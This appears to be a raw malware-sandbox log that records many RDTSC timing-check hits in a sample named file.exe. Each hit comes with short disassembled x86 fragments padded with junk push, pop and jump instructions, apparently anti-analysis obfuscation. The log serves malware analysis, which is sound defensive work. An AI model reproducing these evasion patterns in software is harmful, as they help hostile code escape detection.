Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B99F4 second address: 7B9A10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F8A9C76F21Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jo 00007F8A9C76F216h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740DEA second address: 740DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F8A9D254EAEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 740DFE second address: 740E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8E19 second address: 7B8E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8E1F second address: 7B8E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8E23 second address: 7B8E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8E2D second address: 7B8E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8FA5 second address: 7B8FB1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A9D254EA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8FB1 second address: 7B8FB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B90F4 second address: 7B90F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B90F8 second address: 7B9111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9C76F223h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9111 second address: 7B913C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8A9D254EADh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B913C second address: 7B915B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F8A9C76F216h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B915B second address: 7B9174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A9D254EB4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B92EE second address: 7B92F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B92F4 second address: 7B92F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9430 second address: 7B943C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8A9C76F216h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B959E second address: 7B95A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B95A4 second address: 7B95B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 ja 00007F8A9C76F21Ah 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B95B9 second address: 7B95E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F8A9D254EB5h 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BC6F6 second address: 7BC712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9C76F223h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BC712 second address: 7BC716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747962 second address: 747968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747968 second address: 74796C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74796C second address: 747988 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A9C76F216h 0x00000008 jmp 00007F8A9C76F222h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747988 second address: 74799F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EB1h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5D81 second address: 7C5D9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A9C76F216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F8A9C76F21Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4C5A second address: 7C4C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4C63 second address: 7C4C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C480B second address: 7C481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9D254EABh 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C481B second address: 7C483E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F227h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F8A9C76F216h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C483E second address: 7C4842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C579D second address: 7C57DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8A9C76F22Fh 0x0000000a jc 00007F8A9C76F218h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F8A9C76F21Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C57DA second address: 7C57E4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8A9D254EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73BD80 second address: 73BD88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73BD88 second address: 73BD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA2B9 second address: 7CA2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA2BD second address: 7CA2C9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A9D254EA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA2C9 second address: 7CA2CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA95F second address: 7CA984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA984 second address: 7CA988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA988 second address: 7CA98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D016D second address: 7D017D instructions: 0x00000000 rdtsc 0x00000002 je 00007F8A9C76F222h 0x00000008 jnl 00007F8A9C76F216h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF023 second address: 7CF047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8A9D254EAFh 0x0000000c jmp 00007F8A9D254EAEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79615A second address: 5DE987 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8A9C76F216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ecx, dword ptr [ebp+122D2770h] 0x00000014 push dword ptr [ebp+122D00C9h] 0x0000001a adc edx, 56B2E6BEh 0x00000020 call dword ptr [ebp+122D228Bh] 0x00000026 pushad 0x00000027 pushad 0x00000028 push ecx 0x00000029 or ebx, dword ptr [ebp+122D351Eh] 0x0000002f pop edi 0x00000030 mov edi, dword ptr [ebp+122D35FEh] 0x00000036 popad 0x00000037 xor eax, eax 0x00000039 jc 00007F8A9C76F21Ch 0x0000003f add dword ptr [ebp+122D1C3Bh], esi 0x00000045 jmp 00007F8A9C76F226h 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e mov dword ptr [ebp+122D1AC0h], eax 0x00000054 mov dword ptr [ebp+122D356Ah], eax 0x0000005a cmc 0x0000005b mov esi, 0000003Ch 0x00000060 jmp 00007F8A9C76F221h 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jo 00007F8A9C76F217h 0x0000006f cmc 0x00000070 lodsw 0x00000072 cmc 0x00000073 cld 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jmp 00007F8A9C76F228h 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1D10h], eax 0x00000087 nop 0x00000088 push eax 0x00000089 push edx 0x0000008a push ebx 0x0000008b pushad 0x0000008c popad 0x0000008d pop ebx 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796386 second address: 79638B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79638B second address: 796399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796399 second address: 79639F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79639F second address: 7963A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7963A5 second address: 7963A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796668 second address: 79666C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79666C second address: 79667A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796826 second address: 796835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F8A9C76F216h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796BD6 second address: 796BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796BF9 second address: 796BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797055 second address: 79705A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF340 second address: 7CF34E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9C76F21Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF4D7 second address: 7CF4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF4DD second address: 7CF4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CF4E2 second address: 7CF4EC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A9D254EACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFB71 second address: 7CFB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD0D second address: 7CFD13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD13 second address: 7CFD19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD19 second address: 7CFD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD25 second address: 7CFD2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3A4A second address: 7D3A5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAEh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3EB1 second address: 7D3ED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F225h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D631F second address: 7D6356 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F8A9D254EA6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jp 00007F8A9D254EB7h 0x00000013 push esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jnl 00007F8A9D254EA6h 0x0000001c pop esi 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DB7AC second address: 7DB7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBAD4 second address: 7DBAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8A9D254EB2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBAEC second address: 7DBAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBC50 second address: 7DBC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8A9D254EA6h 0x0000000a popad 0x0000000b jc 00007F8A9D254EDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F8A9D254EB7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DBC7C second address: 7DBC8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79698E second address: 796995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796995 second address: 7969FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8A9C76F216h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F8A9C76F218h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 sbb edi, 08092347h 0x0000002f mov dword ptr [ebp+1244C329h], edi 0x00000035 mov ebx, dword ptr [ebp+1248AABDh] 0x0000003b mov dword ptr [ebp+122D2290h], edx 0x00000041 add eax, ebx 0x00000043 adc di, 058Bh 0x00000048 nop 0x00000049 jne 00007F8A9C76F21Ah 0x0000004f push eax 0x00000050 je 00007F8A9C76F22Ch 0x00000056 push eax 0x00000057 push edx 0x00000058 jp 00007F8A9C76F216h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DC0AA second address: 7DC0B0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCC35 second address: 7DCC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCC39 second address: 7DCC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8A9D254EACh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DCC4B second address: 7DCC63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8A9C76F223h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0DF2 second address: 7E0DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0DF7 second address: 7E0E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F8A9C76F22Ch 0x00000015 jmp 00007F8A9C76F226h 0x0000001a jc 00007F8A9C76F21Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0E2E second address: 7E0E38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8A9D254EB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0396 second address: 7E03A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0628 second address: 7E0638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F8A9D254EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0638 second address: 7E063C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4B82 second address: 7E4B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4301 second address: 7E4305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E448F second address: 7E4497 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4497 second address: 7E44BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A9C76F22Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E486E second address: 7E4872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ECE2E second address: 7ECE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ECE34 second address: 7ECE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A9D254EB4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F8A9D254EA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7ECE56 second address: 7ECE5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAF39 second address: 7EAF54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EAEh 0x00000007 jl 00007F8A9D254EA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB0AE second address: 7EB0B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB448 second address: 7EB450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
